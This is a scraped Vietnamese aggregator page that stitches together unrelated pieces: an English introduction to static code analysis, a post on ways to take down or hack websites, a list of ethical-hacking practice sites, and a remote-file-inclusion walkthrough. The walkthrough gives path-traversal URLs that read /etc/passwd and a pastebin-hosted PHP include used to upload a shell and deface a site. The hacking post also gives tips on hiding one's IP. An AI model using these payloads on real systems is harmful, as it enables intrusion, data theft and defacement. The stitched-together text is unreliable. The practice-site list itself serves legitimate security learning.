Xem Nhiều 6/2023 #️ Dăm Ba Cách Hack Sập Một Trang Web # Top 9 Trend | Karefresh.com

Xem Nhiều 6/2023 # Dăm Ba Cách Hack Sập Một Trang Web # Top 9 Trend

Cập nhật thông tin chi tiết về Dăm Ba Cách Hack Sập Một Trang Web mới nhất trên website Karefresh.com. Hy vọng nội dung bài viết sẽ đáp ứng được nhu cầu của bạn, chúng tôi sẽ thường xuyên cập nhật mới nội dung để bạn nhận được thông tin nhanh chóng và chính xác nhất.

Static code analysis refers to the technique of approximating the runtime behavior of a program. In other words, it is the process of predicting the output of a program without actually executing it.

Lately, however, the term “Static Code Analysis” is more commonly used to refer to one of the applications of this technique rather than the technique itself — program comprehension — understanding the program and detecting issues in it (anything from syntax errors to type mismatches, performance hogs likely bugs, security loopholes, etc.). This is the usage we’d be referring to throughout this post.

“The refinement of techniques for the prompt discovery of error serves as well as any other as a hallmark of what we mean by science.”

J. Robert Oppenheimer

Outline

We cover a lot of ground in this post. The aim is to build an understanding of static code analysis and to equip you with the basic theory, and the right tools so that you can write analyzers on your own.

We start our journey with laying down the essential parts of the pipeline which a compiler follows to understand what a piece of code does. We learn where to tap points in this pipeline to plug in our analyzers and extract meaningful information. In the latter half, we get our feet wet, and write four such static analyzers, completely from scratch, in Python.

Note that although the ideas here are discussed in light of Python, static code analyzers across all programming languages are carved out along similar lines. We chose Python because of the availability of an easy to use ast module, and wide adoption of the language itself.

How does it all work?

Before a computer can finally “understand” and execute a piece of code, it goes through a series of complicated transformations:

As you can see in the diagram (go ahead, zoom it!), the static analyzers feed on the output of these stages. To be able to better understand the static analysis techniques, let’s look at each of these steps in some more detail:

Scanning

The first thing that a compiler does when trying to understand a piece of code is to break it down into smaller chunks, also known as tokens. Tokens are akin to what words are in a language.

Python provides the tokenize module in its standard library to let you play around with tokens:

Python

1

import io

2

import tokenize

3

4

code = b"color = input('Enter your favourite color: ')"

5

6

for token in tokenize.tokenize(io.BytesIO(code).readline):

7

   print(token)

Python

1

TokenInfo(type=62 (ENCODING),  string='utf-8')

2

TokenInfo(type=1 (NAME),      string='color')

3

TokenInfo(type=54 (OP),        string='=')

4

TokenInfo(type=1 (NAME),      string='input')

5

TokenInfo(type=54 (OP),        string='(')

6

TokenInfo(type=3 (STRING),    string="'Enter your favourite color: '")

7

TokenInfo(type=54 (OP),        string=')')

8

TokenInfo(type=4 (NEWLINE),   string='')

9

TokenInfo(type=0 (ENDMARKER), string='')

(Note that for the sake of readability, I’ve omitted a few columns from the result above — metadata like starting index, ending index, a copy of the line on which a token occurs, etc.)

#code quality #code review #static analysis #static code analysis #code analysis #static analysis tools #code review tips #static code analyzer #static code analysis tool #static analyzer

Dăm Ba Cách Hack Sập 1 Website Nào Đó

Đã bao giờ bạn thắc mắc làm sao hacker có thể hack sập 1 website chưa? Hack gồm những bước nào, tìm hiểu trang web ra sao? Làm sao để không bị phát hiện v..v.

Đôi lời cảnh báo trước khi hack

Nội dung bài viết mang tính chất học thuật, tham khảo. Phụ nữ dưới 18 tuổi và trẻ em có thai không nên làm theo, mọi hậu quả mình không chịu trách nhiệm.

Bản thân việc hack là không phạm pháp. Tuy nhiên sử dụng kĩ thuật hack để tấn công mạng, đánh cắp dữ liệu, sửa đổi thông tin v…v đều là hành động phạm pháp, khả năng ngồi nhà đá khá cao, các bạn nên cẩn thận suy nghĩ trước khi làm!

Nếu không cẩn thận, bạn rất dễ bị lộ IP khi hack. Các tổ chức điều tra, nhà nước có quyền yêu cầu ISP (nhà mạng) cung cấp thông tin về tên tuổi, địa chỉ, chủ của IP đó. Xác suất bạn bị … nắm đầu rất cao nếu không cẩn thận.

Sử dụng VPN, Proxy … có thể giảm khả năng bị lộ IP. Tuy nhiên, cũng đã có trường hợp chính quyền yêu cầu nhà cung cấp VPN/proxy cung cấp log cho họ, nên vẫn có thể bị lộ nếu xui.

Ok viết vậy để rũ bỏ trách nhiệm thôi, chứ mình nghĩ bạn đọc của Code Dạo toàn là những con người sống có đạo đức, không đi hack lung tung đâu nà.

Bước 1 – Tìm hiểu đối tượng cần tấn công

Để hack thành công một trang web, bước đầu tiên cần làm cũng giống như tán gái vậy: tìm hiểu đối tượng cần tấn công.

Với việc tán gái, bạn phải tìm hiểu tên tuổi, trường học, sở thích … của người ta mới tán được. Với việc hack 1 trang web, bạn cũng nên tìm hiểu những điều sau:

Công nghệ dùng build web đó: Tra xem web được code bằng công nghệ gì (Web viết bằng PHP hay C#, dùng server gì, phiên bản bao nhiêu)

IP thật của trang web: Từ IP này, ta có thể truy ra server trang web nằm ở đâu, nhà cung cấp nào

Dựa theo IP, scan server thật của web để xem nó dùng hệ điều hành nào, web server phiên bản gì, trên server có gì (mall server, database v…v), có những port nào mở

Dùng tool để scan sơ những lỗ hổng bảo mật hay gặp của web

Trong quá trình tìm hiểu này, bạn nên viết lại những thứ thú vị mà mình tìm hiểu được để sau này tra cho dễ. Một số tool thường được dùng ở giai đoạn này là:

Nmap – Scan các port đang mở, xem các service nào đang chạy, version của các service đó

Buidwith/WapPalyzer – Tra xem trang web được viết bằng công nghệ gì, chạy trên server nào

TheHaverster/DNS Dumspter – Truy cập DNS history, mò ngược ra IP, subdomain của 1 trang web

Dirbuster/gobuster – Scan các url, domain của 1 trang web

BurpSuite/Nikto/Nessus – Scan các lỗ hổng bảo mật thường gặp

Cách 1 – Report trang web

Cách này khá đơn giản: Report trực tiếp trang web cho nhà cung cấp hosting, cung cấp service, yêu cầu họ gỡ bỏ trang web. (Làm sao để biết web đó nằm ở hosting nào thì bạn xem lại bước trên).

Ưu điểm của cách này là khá dễ dàng, không cần nhiều kiến thức kĩ thuật. Xác suất thành công lại khá cao nếu như web của bạn report là web spam, vi phạm bản quyền, lừa đảo, chứa nội dung phạm pháp, bạo lực v…v

Nhược điểm là đôi khi cách này hơi lâu, vì phải chờ bên cung cấp họ duyệt, và cũng chưa chắc thành công nếu nội dung web là hợp pháp. Chưa kể, chủ web có thể dùng Cloudflare để ẩn IP thật, chuyển trang web qua nhà cung cấp khác an toàn hơn, hoặc tự host.

Cách này cũng chỉ có thể đánh sập chứ không thể nào lấy dữ liệu, làm hư web hoặc tra ra chủ trang web được.

Cách 2 – Tấn công lỗ hỗng của web

Cách này tức là lợi dung lỗ hổng của trang web để chiếm quyền truy cập, upload shell, chạy script để phá hoại, chôm dữ liệu.

Cách này đòi hỏi các bạn phải có kiến thức về lập trình và bảo mật, biết cách 1 trang web hoạt động, biết những lỗ hỗng bảo mật hay gặp (XSS, SQL Injection ….) mới có hướng tấn công.

Ưu điểm của cách này là… rất hiệu quả. Nếu thành công, các bạn có thể truy cập được toàn bộ dữ liệu, chiếm quyền trên web server, muốn xoá sạch dữ liệu hay sập web cũng hoàn toàn có thể.

Nhược điểm của cách này là … kha khó, đòi hỏi nhiều kiến thức bảo mật, và mất nhiều thời gian mò mẫm. Chưa kể, không phải web nào cũng có lỗ hổng bảo mật, có khi tìm hoài cũng không ra.

Các tool hay dùng và kiến thức cần biết:

Metasploit – Chứa rất nhiều payload và code để tấn công một phiên bản phần mềm nào đó

Searchsploit – Tương tự như Metasploit, nhưng khó dùng hơn và nhiều code hơn

Google – Sau khi biết được công nghệ web đó dùng (vd Apache 2.2), ta có thể Google Apache 2.2 exploit để tìm các lỗ hổng, cách tấn công

BurpSuite/Fiddler/Postman để chỉnh sửa request gửi lên/response nhận về từ server

Tạm kết

Các Trang Web Để Học Đạo Đức Hacking Trực Tuyến Một Cách Đơn Giản

Một trong những lựa chọn chúng tôi có là HackThis . Đây là một nền tảng an ninh mạng tương tác nhằm mục đích chỉ ra cách bảo vệ web, tìm hiểu thông qua các mục tiêu khác nhau. Nó có nhiều hơn 60 mức độ khác nhau và cho phép bạn tìm hiểu với các hướng dẫn và bài báo mà họ hiển thị.

Trên trang web này, chúng ta có thể thấy một loạt các thách thức được chia thành các loại. Ví dụ: nó cho phép bạn tìm cách phá mã CAPTCHA. Nó khá toàn diện và chúng tôi có thể xem tất cả nội dung trên trang web của bạn và điều tra những gì chúng tôi quan tâm nhất.

Google Gruyere

Bạn không thể bỏ lỡ một lựa chọn từ Google . Google Gruyere là một trang web được tạo ra bởi gã khổng lồ tìm kiếm với mục đích đưa những hacker có đạo đức vào thử nghiệm. Nó có một số lỗ hổng được tạo cẩn thận cho nhiệm vụ này.

Nhìn bề ngoài, nó không phải là trang web tốt nhất, như chúng ta sẽ thấy khi chúng ta truy cập, nhưng nó rất hữu ích nếu chúng ta muốn kiểm tra tính bảo mật của một trang web. Nó hướng dẫn người dùng các tác vụ khác nhau sẽ được thực hiện.

Chúng ta có thể thấy, như trang web cho chúng ta thấy, rằng một số thử thách đòi hỏi kiến ​​thức nhất định, trong khi những thử thách khác thì cơ bản hơn.

OverTheWire

Chúng ta có thể nói rằng OverTheWire tùy chọn nâng cao hơn. Nó cho thấy các kịch bản khác nhau trong đó người dùng có thể phát triển các kỹ năng hack có đạo đức của họ. Nó cũng cho phép cạnh tranh giữa những người dùng muốn tấn công máy chủ của người khác.

Tuy nhiên, mặc dù nó có nhiều công cụ và phương pháp tiên tiến hơn, nó cũng có nhiều bài học cơ bản hơn, nơi họ dạy những điều cần thiết cho những ai muốn bắt đầu trong thế giới này. Để sử dụng, nó yêu cầu kết nối SSH.

Trang web này đặc biệt nổi bật với số lượng lớn các lỗi họ có. Họ chỉ ra rằng có hơn 100, vì vậy các hacker có đạo đức sẽ có nhiều khả năng để đưa mọi thứ họ đã học vào thử nghiệm.

An ninh tấn công

Một lựa chọn nữa là An ninh tấn công . Nó cung cấp một số lượng lớn các khóa học, chứng chỉ và đào tạo cho các tổ chức . Chúng tôi có thể nói rằng nó được định hướng nhiều hơn cho các chuyên gia và các nhóm muốn mở rộng kiến ​​thức của họ.

Trên trang web của nó, chúng tôi có thể tìm thấy một loạt các tùy chọn để kiểm tra kiến ​​thức và các công cụ mà chúng tôi có thể sử dụng. Ví dụ, chúng tôi có thể sử dụng các phòng thí nghiệm ảo để thực hiện các hành động này.

Với Tế bào chúng ta có thể nhận được một trang web đầy tài liệu hack đạo đức miễn phí . Chúng ta có thể học hỏi và đóng góp cho cộng đồng bằng chính kiến ​​thức của mình. Nó được thiết kế cho cả cá nhân và nhóm.

Mặc dù chúng ta có thể tạo tài khoản và tải nội dung miễn phí, nó cũng có phần thanh toán, nơi chúng ta sẽ thấy nhiều tùy chọn hơn.

HackThisSite

Một trang web nữa mà chúng tôi muốn hiển thị là HackThisSite . Đó là một trang web khác cũng cho phép chúng tôi hack nó . Nó hoạt động như một nguồn học tập rất thú vị. Nó cung cấp các bài học cho những người mới bắt đầu, cũng như nội dung nâng cao hơn.

Trang web này là một trang web cổ điển và đã tồn tại trong nhiều năm. Nó cung cấp các tài nguyên rất thú vị cho tất cả những ai muốn tìm hiểu.

Tóm lại, đây là một danh sách thú vị với một số trang web dành riêng cho việc hack đạo đức mà chúng ta có thể tìm hiểu các tài nguyên khác nhau và thử nghiệm các kỹ năng của mình.

Các Hacker Đã Hack Trang Web Như Nào ?

Đa số mọi người đã từng thấy 1 trang web bị hack và thay đổi giao diện là anonymous, hacked by abc, …… Vậy làm thế nào các hacker có thể làm được điều đó? Cho tới hiện tại mình biết được 3 cách:

Remote File Include (RFI)

SQL injection.

Cross-site Scripting.

Đặc điểm cả 3 đều thực hiện Upload Shell hay còn gọi là tải file độc hại lên sever thậm chí php, html, js, …..Đầu tiên ta đi đến cách đầu tiên: Remote File Include (RFI)

Lỗ hổng File Inclusion cho phép tin tặc truy cập trái phép vào những tập tin nhạy cảm trên máy chủ web hoặc thực thi các tệp tin độc hại bằng cách sử dụng chức năng “include”.

Lỗ hổng này xảy ra do cơ chế kiểm tra đầu vào không được thực hiện tốt, khiến tin tặc có thể khai thác và chèn các dự liệu độc hại.

Giải thích như sau: cái trang php kia sẽ đọc file từ chúng tôi mà biến page đã được gán. Lúc này nếu sơ hở không lọc kỹ càng, các hacker sẽ lợi dụng lỗ hổng này để khai thác và đọc nhiều file nhạy cảm hơn password Đến đây ta thử thành đường dẫn google xem như nào.

abc. com/index.php?page=http:// google.com

Tada! Hiện ra nguyên trang search google luôn.

Vậy là chúng tôi không lọc input đầu vào, ta có thể đọc được file password không? Ban đầu mình thử etc/passwd

abc. com/index.php?page=etc/passwd

Kết quả không show ra gì. Tiếp tục sử dụng kĩ thuật path lên 1 thư mục bằng ../

abc. com/index.php?page=../etc/passwd

Vẫn không hiện. Tiếp tục path.

abc. com/index.php?page=../../etc/passwd

Tada! Nguyên passwd đã lộ ra sau 2 lần thử .

Chưa dừng lại ở đây. Nếu có thể đọc được bất kì file gì. Sao ta lại không thử đọc 1 file với mục đích upload file lên sever. Chuẩn bị 1 file chúng tôi Copy code vào pastebin nhằm mục đích lấy link. Sau 1 hồi ta được 1 link với code php để upload file. Sau 1 hồi ta được kết quả:

abc. com/index.php?page=https:// pastebin. com/xyz

Ok up file đã hiện lên!

Giờ chỉ cần tới công đoạn up file bất kì nào lên thôi tùy mục đích của hacker. Trong video mình muốn ghi đè file dispo_cal.php nên mình đã tạo 1 file php với tên y chang nhưng source code là trang web giao diện thông báo trang web này đã bị hack. Và cuối cùng thành công! Hoàn thành thử thách.

Chia sẻ Nguyễn Quốc Khánh – J2Team

Bạn đang xem bài viết Dăm Ba Cách Hack Sập Một Trang Web trên website Karefresh.com. Hy vọng những thông tin mà chúng tôi đã chia sẻ là hữu ích với bạn. Nếu nội dung hay, ý nghĩa bạn hãy chia sẻ với bạn bè của mình và luôn theo dõi, ủng hộ chúng tôi để cập nhật những thông tin mới nhất. Chúc bạn một ngày tốt lành!